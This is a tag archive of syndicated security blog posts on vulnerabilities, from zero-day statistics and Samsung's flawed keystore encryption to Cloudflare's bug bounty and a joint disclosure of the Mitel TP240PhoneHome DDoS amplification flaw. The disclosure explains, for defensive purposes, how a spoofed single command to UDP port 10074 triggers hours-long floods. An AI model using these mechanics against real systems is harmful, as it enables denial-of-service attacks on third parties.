Tag Archives: vulnerabilities

Zero-Day Vulnerabilities Are on the Rise

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/04/zero-day-vulnerabilities-are-on-the-rise.html

Both Google and Mandiant are reporting a significant increase in the number of zero-day vulnerabilities reported in 2021.


2021 included the detection and disclosure of 58 in-the-wild 0-days, the most ever recorded since Project Zero began tracking in mid-2014. That’s more than double the previous maximum of 28 detected in 2015 and especially stark when you consider that there were only 25 detected in 2020. We’ve tracked publicly known in-the-wild 0-day exploits in this spreadsheet since mid-2014.

While we often talk about the number of 0-day exploits used in-the-wild, what we’re actually discussing is the number of 0-day exploits detected and disclosed as in-the-wild. And that leads into our first conclusion: we believe the large uptick in in-the-wild 0-days in 2021 is due to increased detection and disclosure of these 0-days, rather than simply increased usage of 0-day exploits.


In 2021, Mandiant Threat Intelligence identified 80 zero-days exploited in the wild, which is more than double the previous record volume in 2019. State-sponsored groups continue to be the primary actors exploiting zero-day vulnerabilities, led by Chinese groups. The proportion of financially motivated actors­ — particularly ransomware groups — ­deploying zero-day exploits also grew significantly, and nearly 1 in 3 identified actors exploiting zero-days in 2021 was financially motivated. Threat actors exploited zero-days in Microsoft, Apple, and Google products most frequently, likely reflecting the popularity of these vendors. The vast increase in zero-day exploitation in 2021, as well as the diversification of actors using them, expands the risk portfolio for organizations in nearly every industry sector and geography, particularly those that rely on these popular systems.

News article.

Wyze Camera Vulnerability

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/04/wyze-camera-vulnerability.html

Wyze ignored a vulnerability in its home security cameras for three years. Bitdefender, who discovered the vulnerability, let the company get away with it.

In case you’re wondering, no, that is not normal in the security community. While experts tell me that the concept of a “responsible disclosure timeline” is a little outdated and heavily depends on the situation, we’re generally measuring in days, not years. “The majority of researchers have policies where if they make a good faith effort to reach a vendor and don’t get a response, that they publicly disclose in 30 days,” Alex Stamos, director of the Stanford Internet Observatory and former chief security officer at Facebook, tells me.

Why Vaccine Cards Are So Easily Forged

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/03/why-vaccine-cards-are-so-easily-forged.html

My proof of COVID-19 vaccination is recorded on an easy-to-forge paper card. With little trouble, I could print a blank form, fill it out, and snap a photo. Small imperfections wouldn’t pose any problem; you can’t see whether the paper’s weight is right in a digital image. When I fly internationally, I have to show a negative COVID-19 test result. That, too, would be easy to fake. I could change the date on an old test, or put my name on someone else’s test, or even just make something up on my computer. After all, there’s no standard format for test results; airlines accept anything that looks plausible.

After a career spent in cybersecurity, this is just how my mind works: I find vulnerabilities in everything I see. When it comes to the measures intended to keep us safe from COVID-19, I don’t even have to look very hard. But I’m not alarmed. The fact that these measures are flawed is precisely why they’re going to be so helpful in getting us past the pandemic.

Back in 2003, at the height of our collective terrorism panic, I coined the term security theater to describe measures that look like they’re doing something but aren’t. We did a lot of security theater back then: ID checks to get into buildings, even though terrorists have IDs; random bag searches in subway stations, forcing terrorists to walk to the next station; airport bans on containers with more than 3.4 ounces of liquid, which can be recombined into larger bottles on the other side of security. At first glance, asking people for photos of easily forged pieces of paper or printouts of readily faked test results might look like the same sort of security theater. There’s an important difference, though, between the most effective strategies for preventing terrorism and those for preventing COVID-19 transmission.

Security measures fail in one of two ways: Either they can’t stop a bad actor from doing a bad thing, or they block an innocent person from doing an innocuous thing. Sometimes one is more important than the other. When it comes to attacks that have catastrophic effects—say, launching nuclear missiles—we want the security to stop all bad actors, even at the expense of usability. But when we’re talking about milder attacks, the balance is less obvious. Sure, banks want credit cards to be impervious to fraud, but if the security measures also regularly prevent us from using our own credit cards, we would rebel and banks would lose money. So banks often put ease of use ahead of security.

That’s how we should think about COVID-19 vaccine cards and test documentation. We’re not looking for perfection. If most everyone follows the rules and doesn’t cheat, we win. Making these systems easy to use is the priority. The alternative just isn’t worth it.

I design computer security systems for a living. Given the challenge, I could design a system of vaccine and test verification that makes cheating very hard. I could issue cards that are as unforgeable as passports, or create phone apps that are linked to highly secure centralized databases. I could build a massive surveillance apparatus and enforce the sorts of strict containment measures used in China’s zero-COVID-19 policy. But the costs—in money, in liberty, in privacy—are too high. We can get most of the benefits with some pieces of paper and broad, but not universal, compliance with the rules.

It also helps that many of the people who break the rules are so very bad at it. Every story of someone getting arrested for faking a vaccine card, or selling a fake, makes it less likely that the next person will cheat. Every traveler arrested for faking a COVID-19 test does the same thing. When a famous athlete such as Novak Djokovic gets caught lying about his past COVID-19 diagnosis when trying to enter Australia, others conclude that they shouldn’t try lying themselves.

Our goal should be to impose the best policies that we can, given the trade-offs. The small number of cheaters isn’t going to be a public-health problem. I don’t even care if they feel smug about cheating the system. The system is resilient; it can withstand some cheating.

Last month, I visited New York City, where restrictions that are now being lifted were then still in effect. Every restaurant and cocktail bar I went to verified the photo of my vaccine card that I keep on my phone, and at least pretended to compare the name on that card with the one on my photo ID. I felt a lot safer in those restaurants because of that security theater, even if a few of my fellow patrons cheated.

This essay previously appeared in the Atlantic.

CVE-2022-26143: A Zero-Day vulnerability for launching UDP amplification DDoS attacks

Post Syndicated from Omer Yoachimik original https://blog.cloudflare.com/cve-2022-26143-amplification-attack/

CVE-2022-26143: A Zero-Day vulnerability for launching UDP amplification DDoS attacks

CVE-2022-26143: A Zero-Day vulnerability for launching UDP amplification DDoS attacks

A zero-day vulnerability in the Mitel MiCollab business phone system has recently been discovered (CVE-2022-26143). This vulnerability, called TP240PhoneHome, which Cloudflare customers are already protected against, can be used to launch UDP amplification attacks. This type of attack reflects traffic off vulnerable servers to victims, amplifying the amount of traffic sent in the process by an amplification factor of 220 billion percent in this specific case.

Cloudflare has been actively involved in investigating the TP240PhoneHome exploit, along with other members of the InfoSec community. Read our joint disclosure here for more details. As far as we can tell, the vulnerability has been exploited as early as February 18, 2022. We have deployed emergency mitigation rules to protect Cloudflare customers against the amplification DDoS attacks.

Mitel has been informed of the vulnerability. As of February 22, they have issued a high severity security advisory advising their customers to block exploitation attempts using a firewall, until a software patch is made available. Cloudflare Magic Transit customers can use the Magic Firewall to block external traffic to the exposed Mitel UDP port 10074 by following the example in the screenshot below, or by pasting the following expression into their Magic Firewall rule editor and selecting the Block action:

(udp.dstport eq 10074).

CVE-2022-26143: A Zero-Day vulnerability for launching UDP amplification DDoS attacks
Creating a Magic Firewall rule to block traffic to port 10074

To learn more, register for our webinar on March 23rd, 2022.

Exploiting the vulnerability to launch DDoS attacks

Mitel Networks is based in Canada and provides business communications and collaboration products to over 70 million business users around the world. Amongst their enterprise collaboration products is the aforementioned Mitel MiCollab platform, known to be used in critical infrastructure such as municipal governments, schools, and emergency services. The vulnerability was discovered in the Mitel MiCollab platform.

The vulnerability manifests as an unauthenticated UDP port that is incorrectly exposed to the public Internet. The call control protocol running on this port can be used to, amongst other things, issue the debugging command startblast. This command does not place real telephone calls; rather, it simulates a “blast” of calls in order to test the system. For each test call that is made, two UDP packets are emitted in response to the issuer of the command.

According to the security advisory, the exploit can “allow a malicious actor to gain unauthorized access to sensitive information and services, cause performance degradations or a denial of service condition on the affected system. If exploited with a denial of service attack, the impacted system may cause significant outbound traffic impacting availability of other services.

Since this is an unauthenticated and connectionless UDP-based protocol, you can use spoofing to direct the response traffic toward any IP and port number — and by doing so, reflect and amplify a DDoS attack to the victim.

We’ve mainly focused on the amplification vector because it can be used to hurt the whole Internet, but the phone systems themselves can likely be hurt in other ways with this vulnerability. This UDP call control port offers many other commands. With some work, it’s likely that you could use this UDP port to commit toll fraud, or to simply render the phone system inoperable. We haven’t assessed these other possibilities, because we do not have access to a device that we can safely test with.

The good news

Fortunately, only a few thousand of these devices are improperly exposed to the public Internet, meaning that this vector can “only” achieve several hundred million packets per second total. This volume of traffic can cause major outages if you’re not protected by an always-on automated DDoS protection service, but it’s nothing to be concerned with if you are.

Furthermore, an attacker can’t run multiple commands at the same time. Instead, the server queues up commands and executes them serially. The fact that you can only launch one attack at a time from these devices, mixed with the fact that you can make that attack for many hours, has fascinating implications. If an attacker chooses to start an attack by specifying a very large number of packets, then that box is “burned” – it can’t be used to attack anyone else until the attack completes.

How Cloudflare detects and mitigates DDoS attacks

To defend organizations against DDoS attacks, we built and operate software-defined systems that run autonomously. They automatically detect and mitigate DDoS attacks across our entire network.

Initially, traffic is routed through the Internet via BGP Anycast to the nearest Cloudflare edge data center. Once the traffic reaches our data center, our DDoS systems sample it asynchronously allowing for out-of-path analysis of traffic without introducing latency penalties.

The analysis is done using data streaming algorithms. Packet samples are compared to the fingerprints and multiple real-time signatures are created based on the dynamic masking of various fingerprint attributes. Each time another packet matches one of the signatures, a counter is increased. When the system qualifies an attack, i.e., the activation threshold is reached for a given signature, a mitigation rule is compiled and pushed inline. The mitigation rule includes the real-time signature and the mitigation action, e.g., drop.

CVE-2022-26143: A Zero-Day vulnerability for launching UDP amplification DDoS attacks

You can read more about our autonomous DDoS protection systems and how they work in our joint-disclosure technical blog post.

Helping build a better Internet

Cloudflare’s mission is to help build a better Internet. A better Internet is one that is more secure, faster, and reliable for everyone — even in the face of DDoS attacks and emerging zero-day threats. As part of our mission, since 2017, we’ve been providing unmetered and unlimited DDoS protection for free to all of our customers. Over the years, it has become increasingly easier for attackers to launch DDoS attacks. To counter the attacker’s advantage, we want to make sure that it is also easy and free for organizations of all sizes to protect themselves against DDoS attacks of all types.

Not using Cloudflare yet? Start now.

CVE-2022-26143: TP240PhoneHome reflection/amplification DDoS attack vector

Post Syndicated from Alex Forster original https://blog.cloudflare.com/cve-2022-26143/

CVE-2022-26143: TP240PhoneHome reflection/amplification DDoS attack vector

Beginning in mid-February 2022, security researchers, network operators, and security vendors observed a spike in DDoS attacks sourced from UDP port 10074 targeting broadband access ISPs, financial institutions, logistics companies, and organizations in other vertical markets.

Upon further investigation, it was determined that the devices abused to launch these attacks are MiCollab and MiVoice Business Express collaboration systems produced by Mitel, which incorporate TP-240 VoIP- processing interface cards and supporting software; their primary function is to provide Internet-based site-to-site voice connectivity for PBX systems.

Approximately 2600 of these systems have been incorrectly provisioned so that an unauthenticated system test facility has been inadvertently exposed to the public Internet, allowing attackers to leverage these PBX VoIP gateways as DDoS reflectors/amplifiers.

Mitel is aware that these systems are being abused to facilitate high-pps (packets-per-second) DDoS attacks, and have been actively working with customers to remediate abusable devices with patched software that disables public access to the system test facility.

In this blog, we will further explore the observed activity, explain how the driver has been abused, and share recommended mitigation steps. This research was created cooperatively among a team of researchers from Akamai SIRT, Cloudflare, Lumen Black Lotus Labs, NETSCOUT ASERT, TELUS, Team Cymru, and The Shadowserver Foundation.

DDoS attacks in the wild

While spikes of network traffic associated with the vulnerable service were observed on January 8th and February 7,th 2022, we believe the first actual attacks leveraging the exploit began on February 18th.

Observed attacks were primarily predicated on packets-per-second, or throughput, and appeared to be UDP reflection/amplification attacks sourced from UDP/10074 that were mainly directed towards destination ports UDP/80 and UDP/443. The single largest observed attack of this type preceding this one was approximately 53 Mpps and 23 Gbps. The average packet size for that attack was approximately 60 bytes, with an attack duration of approximately 5 minutes. The amplified attack packets are not fragmented.

This particular attack vector differs from most UDP reflection/amplification attack methodologies in that the exposed system test facility can be abused to launch a sustained DDoS attack of up to 14 hours in duration by means of a single spoofed attack initiation packet, resulting in a record-setting packet amplification ratio of 4,294,967,296:1. A controlled test of this DDoS attack vector yielded more than 400 Mmpps of sustained DDoS attack traffic.

It should be noted that this single-packet attack initiation capability has the effect of precluding network operator traceback of the spoofed attack initiator traffic. This helps mask the attack traffic generation infrastructure, making it less likely that the attack origin can be traced compared with other UDP reflection/amplification DDoS attack vectors.

Abusing the tp240dvr driver

The abused service on affected Mitel systems is called tp240dvr (“TP-240 driver”) and appears to run as a software bridge to facilitate interactions with TDM/VoIP PCI interface cards. The service listens for commands on UDP/10074 and is not meant to be exposed to the Internet, as confirmed by the manufacturer of these devices. It is this exposure to the Internet that ultimately allows it to be abused.

The tp240dvr service exposes an unusual command that is designed to stress-test its clients in order to facilitate debugging and performance testing. This command can be abused to cause the tp240dvr service to send this stress-test to attack victims. The traffic consists of a high rate of short informative status update packets that can potentially overwhelm victims and cause the DDoS scenario.

This command can also be abused by attackers to launch very high-throughput attacks. Attackers can use specially-crafted commands to cause the tp240dvr service to send larger informative status update packets, significantly increasing the amplification ratio.

By extensively testing isolated virtual TP-240-based systems in a lab setting, researchers were able to cause these devices to generate massive amounts of traffic in response to comparatively small request payloads. We will cover this attack scenario in greater technical depth in the following sections.

Calculating the potential attack impact

As previously mentioned, amplification via this abusable test facility differs substantially from how it is accomplished with most other UDP reflection/amplification DDoS vectors. Typically, reflection/amplification attacks require the attacker to continuously transmit malicious payloads to abusable nodes for as long as they wish to attack the victim. In the case of TP-240 reflection/amplification, this continuous transmission is not necessary to launch high-impact DDoS attacks.

Instead, an attacker leveraging TP-240 reflection/amplification can launch a high-impact DDoS attack using a single packet. Examination of the tp240dvr binary reveals that, due to its design, an attacker can theoretically cause the service to emit 2,147,483,647 responses to a single malicious command. Each response generates two packets on the wire, leading to approximately 4,294,967,294 amplified attack packets being directed toward the attack victim.

For each response to a command, the first packet contains a counter that increments with each sent response. As the counter value increments, the size of this first packet will grow from 36 bytes to 45 bytes. The second packet contains diagnostic output from the function, which can be influenced by the attacker. By optimizing each initiator packet to maximize the size of the second packet, every command will result in amplified packets that are up to 1,184 bytes in length.

In theory, a single abusable node generating the upper limit of 4,294,967,294 packets at a rate of 80kpps would result in an attack duration of roughly 14 hours. Over the course of the attack, the “counter” packets alone would generate roughly 95.5GB of amplified attack traffic destined for the targeted network. The maximally-padded “diagnostic output” packets would account for an additional 2.5TB of attack traffic directed towards the target.

This would yield a sustained flood of just under 393mb/sec of attack traffic from a single reflector/amplifier, all resulting from a single spoofed attack initiator packet of only 1,119 bytes in length. This results in a nearly unimaginable amplification ratio of 2,200,288,816:1 — a multiplier of 220 billion percent, triggered by a single packet.

Upper boundaries of attack volume and simultaneity

The tp240dvr service processes commands using a single thread. This means they can only process a single command at a time, and thus can only be used to launch one attack at a time. In the example scenario presented above, during the 14 hours that the abused device would be attacking the target, it cannot be leveraged to attack any other target. This is somewhat unique in the context of DDoS reflection/amplification vectors.

Although this characteristic also causes the tp240dvr service to be unavailable to legitimate users, it is much preferable to having these devices be leveraged in parallel by multiple attackers — and leaving legitimate operators of these systems to wonder why their outbound Internet data capacity is being consumed at much higher rates.

Additionally, it appears these devices are on relatively low-powered hardware, in terms of their traffic-generation capabilities. On an Internet where 100/Gbps links, dozens of CPU cores, and multi-threading capabilities have become commonplace, we can all be thankful this abusable service is not found on top-of-the-line hardware platforms capable of individually generating millions of packets per second, and running with thousands of parallelized threads.

Lastly, it is also good news that of the tens of thousands of these devices, which have been purchased and deployed historically by governments, commercial enterprises, and other organizations worldwide, a relatively small number of them have been configured in a manner that leaves them in this abusable state, and of those, many have been properly secured and taken offline from an attacker’s perspective.

Collateral impact

The collateral impact of TP-240 reflection/amplification attacks is potentially significant for organizations with Internet-exposed Mitel MiCollab and MiVoice Business Express collaboration systems that are abused as DDoS reflectors/amplifiers.

This may include partial or full interruption of voice communications through these systems, as well as additional service disruption due to transit capacity consumption, state-table exhaustion of NATs, and stateful firewalls, etc.

Wholesale filtering of all UDP/10074-sourced traffic by network operators may potentially overblock legitimate Internet traffic, and is therefore contraindicated.

TP-240 reflection/amplification DDoS attacks are sourced from UDP/10074 and destined for the UDP port of the attacker’s choice. This amplified attack traffic can be detected, classified, traced back, and safely mitigated using standard DDoS defense tools and techniques.

Flow telemetry and packet capture via open-source and commercial analysis systems can alert network operators and end customers of TP-240 reflection/amplification attacks.

Network access control lists (ACLs), flowspec, destination-based remotely triggered blackhole (D/RTBH), source-based remotely triggered blackhole (S/RTBH), and intelligent DDoS mitigation systems can be used to mitigate these attacks.

Network operators should perform reconnaissance to identify and facilitate remediation of abusable TP-240 reflectors/amplifiers on their networks and/or the networks of their customers.  Operators of Mitel MiCollab and MiVoice Business Express collaboration systems should proactively contact Mitel in order to receive specific remediation instructions from the vendor.

Organizations with business-critical public-facing Internet properties should ensure that all relevant network infrastructure, architectural, and operational Best Current Practices (BCPs) have been implemented, including situationally specific network access policies that only permit Internet traffic via required IP protocols and ports. Internet access network traffic to/from internal organizational personnel should be isolated from Internet traffic to/from public-facing Internet properties, and served via separate upstream Internet transit links.

DDoS defenses for all public-facing Internet properties and supporting infrastructure should be implemented in a situationally appropriate manner, including periodic testing to ensure that any changes to the organization’s servers/services/applications are incorporated into its DDoS defense plan.

It is imperative that organizations operating mission-critical public-facing Internet properties and/or infrastructure ensure that all servers/services/application/datastores/infrastructure elements are protected against DDoS attack, and are included in periodic, realistic tests of the organization’s DDoS mitigation plan. Critical ancillary supporting services such as authoritative and recursive DNS servers must be included in this plan.

Network operators should implement ingress and egress source address validation in order to prevent attackers from initiating reflection/amplification DDoS attacks.

All potential DDoS attack mitigation measures described in this document MUST be tested and customized in a situationally appropriate manner prior to deployment on production networks.

Mitigating factors

Operators of Internet-exposed TP-240-based Mitel MiCollab and MiVoice Business Express collaboration systems can prevent abuse of their systems to launch DDoS attacks by blocking incoming Internet traffic destined for UDP/10074 via access control lists (ACLs), firewall rules, and other standard network access control policy enforcement mechanisms.

Mitel have provided patched software versions that prevent TP-240-equipped MiCollab and MiVoice Business Express collaboration systems from being abused as DDoS reflectors/amplifiers by preventing exposure of the service to the Internet. Mitel customers should contact the vendor for remediation instructions.

Collateral impact to abusable TP-240 reflectors/amplifiers can alert network operators and/or end-customers to remove affected systems from “demilitarized zone” (DMZ) networks or Internet Data Centers (IDCs), or to disable relevant UDP port-forwarding rules that allow specific UDP/10074 traffic sourced from the public Internet to reach these devices, thereby preventing them from being abused to launch reflection/amplification DDoS attacks.

The amplified attack traffic is not fragmented, so there is no additional attack component consisting of non-initial fragments, as is the case with many other UDP reflection/amplification DDoS vectors.

Implementation of ingress and egress source-address validation (SAV; also known as anti-spoofing) can prevent attackers from launching reflection/amplification DDoS attacks.


Unfortunately, many abusable services that should not be exposed to the public Internet are nevertheless left open for attackers to exploit. This scenario is yet another example of real-world deployments not adhering to vendor guidance. Vendors can prevent this situation by adopting “safe by default” postures on devices before shipping.

Reflection/amplification DDoS attacks would be impossible to launch if all network operators implemented ingress and egress source-address validation (SAV, also known as anti-spoofing).  The ability to spoof the IP address(es) of the intended attack target(s) is required to launch such attacks. Service providers must continue to implement SAV in their own networks, and require that their downstream customers do so.

As is routinely the case with newer DDoS attack vectors, it appears that after an initial period of employment by advanced attackers with access to bespoke DDoS attack infrastructure, TP-240 reflection/amplification has been weaponized and added to the arsenals of so-called “booter/stresser” DDoS-for-hire services, placing it within the reach of the general attacker population.

Collaboration across the operational, research, and vendor communities is central to the continued viability of the Internet. The quick response to and ongoing remediation of this high-impact DDoS attack vector has only been possible as a result of such collaboration. Organizations with a vested interest in the stability and resiliency of the Internet should embrace and support cross-industry cooperative efforts as a core principle.

The combined efforts of the research and mitigation task force demonstrates that successful collaboration across industry peers to quickly remediate threats to availability and resiliency is not only possible, but is also increasingly critical for the continued viability of the global Internet.



Research and mitigation task force contributors

Researchers from the following organizations have contributed to the findings and recommendations described in this document:

In particular, the Mitigation Task Force would like to cite Mitel for their exemplary cooperation, rapid response, and ongoing participation in remediation efforts. Mitel quickly created and disseminated patched software, worked with their customers and partners to update affected systems, and supplied valuable expertise as the Task Force worked to formulate this document.

Samsung Encryption Flaw

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/03/samsung-encryption-flaw.html

Researchers have found a major encryption flaw in 100 million Samsung Galaxy phones.

From the abstract:

In this work, we expose the cryptographic design and implementation of Android’s Hardware-Backed Keystore in Samsung’s Galaxy S8, S9, S10, S20, and S21 flagship devices. We reversed-engineered and provide a detailed description of the cryptographic design and code structure, and we unveil severe design flaws. We present an IV reuse attack on AES-GCM that allows an attacker to extract hardware-protected key material, and a downgrade attack that makes even the latest Samsung devices vulnerable to the IV reuse attack. We demonstrate working key extraction attacks on the latest devices. We also show the implications of our attacks on two higher-level cryptographic protocols between the TrustZone and a remote server: we demonstrate a working FIDO2 WebAuthn login bypass and a compromise of Google’s Secure Key Import.

Here are the details:

As we discussed in Section 3, the wrapping key used to encrypt the key blobs (HDK) is derived using a salt value computed by the Keymaster TA. In v15 and v20-s9 blobs, the salt is a deterministic function that depends only on the application ID and application data (and constant strings), which the Normal World client fully controls. This means that for a given application, all key blobs will be encrypted using the same key. As the blobs are encrypted in AES-GCM mode-of-operation, the security of the resulting encryption scheme depends on its IV values never being reused.

Gadzooks. That’s a really embarrassing mistake. GSM needs a new nonce for every encryption. Samsung took a secure cipher mode and implemented it insecurely.

News article.

Vulnerability in Stalkerware Apps

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/03/vulnerability-in-stalkerware-apps.html

TechCrunch is reporting — but not describing in detail — a vulnerability in a series of stalkerware apps that exposes personal information of the victims. The vulnerability isn’t in the apps installed on the victims’ phones, but in the website the stalker goes to view the information the app collects. The article is worth reading, less for the description of the vulnerability and more for the shadowy string of companies behind these stalkerware apps.

Vendors are Fixing Security Flaws Faster

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/02/vendors-are-fixing-security-flaws-faster.html

Google’s Project Zero is reporting that software vendors are patching their code faster.


  • In 2021, vendors took an average of 52 days to fix security vulnerabilities reported from Project Zero. This is a significant acceleration from an average of about 80 days 3 years ago.
  • In addition to the average now being well below the 90-day deadline, we have also seen a dropoff in vendors missing the deadline (or the additional 14-day grace period). In 2021, only one bug exceeded its fix deadline, though 14% of bugs required the grace period.
  • Differences in the amount of time it takes a vendor/product to ship a fix to users reflects their product design, development practices, update cadence, and general processes towards security reports. We hope that this comparison can showcase best practices, and encourage vendors to experiment with new policies.
  • This data aggregation and analysis is relatively new for Project Zero, but we hope to do it more in the future. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities, as well as more data sharing and transparency in general.

Finding Vulnerabilities in Open Source Projects

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/02/finding-vulnerabilities-in-open-source-projects.html

The Open Source Security Foundation announced $10 million in funding from a pool of tech and financial companies, including $5 million from Microsoft and Google, to find vulnerabilities in open source projects:

The “Alpha” side will emphasize vulnerability testing by hand in the most popular open-source projects, developing close working relationships with a handful of the top 200 projects for testing each year. “Omega” will look more at the broader landscape of open source, running automated testing on the top 10,000.

This is an excellent idea. This code ends up in all sorts of critical applications.

Log4j would be a prototypical vulnerability that the Alpha team might look for ­– an unknown problem in a high-impact project that automated tools would not be able to pick up before a human discovered it. The goal is not to use the personnel engaged with Alpha to replicate dependency analysis, for example.

Announcing the public launch of Cloudflare’s bug bounty program

Post Syndicated from Rushil Shah original https://blog.cloudflare.com/cloudflare-bug-bounty-program/

Announcing the public launch of Cloudflare's bug bounty program

Announcing the public launch of Cloudflare's bug bounty program

Today we are launching Cloudflare’s paid public bug bounty program. We believe bug bounties are a vital part of every security team’s toolbox and have been working hard on improving and expanding our private bug bounty program over the last few years. The first iteration of our bug bounty was a pure vulnerability disclosure program without cash bounties. In 2018, we added a private bounty program and are now taking the next step to a public program.

Starting today, anyone can report vulnerabilities related to any Cloudflare product to our public bug bounty program, hosted on HackerOne’s platform.

Let’s walk through our journey so far.

Announcing the public launch of Cloudflare's bug bounty program

Step 1: starting a vulnerability disclosure program

In 2014, when the company had fewer than 100 employees, we created a responsible disclosure policy to provide a safe place for security researchers to submit potential vulnerabilities to our security team, with some established rules of engagement. A vulnerability disclosure policy is an important first step for a company to take because it is an invitation to researchers to look at company assets without fear of repercussions, provided the researchers follow certain guidelines intended to protect everyone involved. We still stand by that policy and welcome reports related to all of our services through that program.

Over the years, we received many great reports through that program which led to improvements in our products. However, one early challenge we faced was that researchers struggled to understand our infrastructure and products. Unlike most of the public programs of that era when we launched, our services were not made up primarily of public facing web applications or even mobile applications; our products were primarily network security and performance solutions that operated as a proxy layer in front of customer resources.

Understanding where Cloudflare fits into the HTTP request/response pipeline can get very challenging with multiple products enabled. And because we did not provide much supporting documentation about how our products worked, and had scoped the program to broadly encompass everything, we left researchers to figure out our complicated products on their own. As a result, most of the reports we received over those early years came from people who saw something that seemed atypical to them, but in our view was not actually a vulnerability in need of repair. We dedicated a tremendous amount of time to triaging false positive reports and helping the researchers understand their errors.

Lesson #1 from that experience: we needed to provide much more detail about our products, so researchers could understand how to dig into our products and identify true vulnerabilities. For example, when a zone is being onboarded to Cloudflare, even before ownership is determined, Cloudflare will display the DNS records for the zone. These DNS records are public information, but researchers have filed reports claiming that this is an information leakage issue. The same results can be obtained with open-source tools. This does not affect existing Cloudflare zones since Cloudflare protects the actual origin IPs from being leaked.

We see the same types of issues come up regularly with the platforms that some companies use to assess the security of their vendors. Off-the-shelf scanners will inaccurately detect vulnerabilities in our platforms because our services not only sit in front of our environment, but the environments of many thousands of customers of all shapes and sizes. We encourage researchers not to use those tools and instead learn more about how our services work.

Announcing the public launch of Cloudflare's bug bounty program

Leaving researchers to their own devices, and failing to invest in helping them understand how our product worked, led to a poor signal-to-noise ratio. At the time of writing, 1,197 reports have been submitted to our vulnerability disclosure program. Of those, only 158 resulted in points going to the researcher for a valid report. With only 13% of reports being valid, we needed to invest in improving the signal-to-noise ratio by helping our researchers before we could expand our program.

Rewards: T-shirts?

Early on, we rewarded researchers with a unique “Cloudflare bug hunter” T-shirt after we validated a vulnerability report. We thought it was a nice gesture at a low cost for people who found security bugs. In practice, when we factored in shipping issues, passing through customs, and wrong sizes, it was a nightmare. Shipping turned out to be such a challenge that we sometimes resorted to hand delivering T-shirts to researchers when attending conferences. It was nice to meet the researchers in person, but not a scalable solution!

Step 2: private bounty program

We have always felt that rewarding good security research deserved more than a T-shirt. We also believed that financially supporting researchers would incentivize higher quality reports and deeper security research.

In order to learn the ropes of operating a paid bounty, in 2018 we opened a private bug bounty program and spent the past few years optimizing.

Our end goal has always been to reach a level of maturity that would allow us to operate a paid public program. To reach that goal we needed to learn how to best support the researchers and improve the signal-to-noise ratio of reports, while building our internal processes to track and remediate a stream of reported vulnerabilities with our engineering teams.

When we launched the private bug bounty we included all Cloudflare products eligible for rewards, and by mid-January 2022 we had paid out \$211,512 in bounties. We started the program by inviting a few researchers and slowly added more overtime. This helped us fine tune our policies and documentation and create a more scalable vulnerability management process internally. Our most prolific participant has earned \$54,800 in bounty rewards, and the signal-to-noise ratio has improved to 68%, with 292 of our 430 total reports receiving a reward.

The success of our private program has largely been the result of consistent effort from the members of our Product Security team to improve our internal handling of issues, and through projects to improve the researcher experience. All bug bounty reports are triaged and validated by members of the security team along with some initial support from HackerOne. Once triaged, the security issues flow through our vulnerability management program, where unique issues are tracked in a single ticket that can be shared outside the security team. To support a scaling program and company, automation was baked into this process and integrations were implemented with our ticketing system.

In this example of a valid report, a ticket was filed containing all the information the reporter provided to HackerOne. Once a report is acknowledged and a VULN ticket is filed, we pay out the security researcher to ensure they receive the reward in a timely fashion.

Announcing the public launch of Cloudflare's bug bounty program

Each ticket is assigned to an Engineering Owner and Security Owner who share the responsibility for remediating the vulnerability. Early on in the process, a service-level agreement (SLA) and remediation timeline are determined by the severity of the issue. If the bug is determined to be of critical severity, it’s all hands on deck to fix the issue.

After initial assignment and SLA determination, the open tickets are reviewed weekly by both Engineering and Security to ensure that problems are being addressed in line with the SLA.

We’ve been working hard to improve the researcher experience. We’ve seen that immediately paying researchers led to a huge improvement in satisfaction compared to waiting weeks or months for a T-shirt. Likewise, it was even more frustrating for security researchers to work hard on an issue and then find out it was out of scope. To address this we constantly update our scope section as we get more out-of-scope reports. Our policy page is now much clearer. We also have treasure maps for some products pointing at major risk areas, and even put together a test site where researchers can test theories.

Ultimately, the success of our private bug bounty came down to the researchers who put in the effort to look for issues. Cloudflare thanks all 419 researchers who have participated in our bug bounty program so far, with a special shout out to the top 10 researchers in the program:

  • zeroxyele
  • esswhy
  • turla
  • ginkoid
  • albertspedersen
  • ryotak
  • base_64
  • dward84
  • ninetynine
  • albinowax

Here’s how our total bounty amounts grew as we improved our program:

2018 – \$4,500
2019 – \$25,425
2020 – \$78,877
2021 – \$101,075

The current breakdown of bounty awards for primary targets based on issue severity is listed below. (All amounts in USD)

Severity Bounty
Critical $3,000
High $1,000
Medium $500
Low $250

Lesson learned: making it easier for researchers with Cloudflare’s testing sandbox

Because of how our services work, you need to have our products deployed in a test environment in order to explore their capabilities and limitations. And many of those products offer features that are not free to use. So, to make vulnerability research more accessible, we created CumulusFire to showcase Cloudflare features that typically require a paid level of service. We created this site for two reasons: to provide a standardized playground where researchers can test their exploits, and to make it easier for our teams to reproduce them while triaging.

CumulusFire has already helped us address the constant trickle of reports in which researchers would configure their origin server in an obviously insecure way, beyond default or expected settings, and then report that Cloudflare’s WAF does not block an attack. By policy, we will now only consider WAF bypasses a vulnerability if it is reproducible on CumulusFire.

As we expand our public program we will add additional services to the testing playground. Since we love dogfooding our own products, the entire sandbox is built on Cloudflare Workers.

Next steps

Just as we grew our private program, we will continue to evolve our public bug bounty program to provide the best experience for researchers. We aim to add more documentation, testing platforms and a way to interact with our security teams so that researchers can be confident that their submissions represent valid security issues.

Look forward to us sharing more of our learnings as we grow the program.

Announcing the public launch of Cloudflare's bug bounty program

Twelve-Year-Old Linux Vulnerability Discovered and Patched

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/01/twelve-year-old-linux-vulnerability-discovered-and-patched.html

It’s a privilege escalation vulnerability:

Linux users on Tuesday got a major dose of bad news — a 12-year-old vulnerability in a system tool called Polkit gives attackers unfettered root privileges on machines running most major distributions of the open source operating system.

Previously called PolicyKit, Polkit manages system-wide privileges in Unix-like OSes. It provides a mechanism for nonprivileged processes to safely interact with privileged processes. It also allows users to execute commands with high privileges by using a component called pkexec, followed by the command.

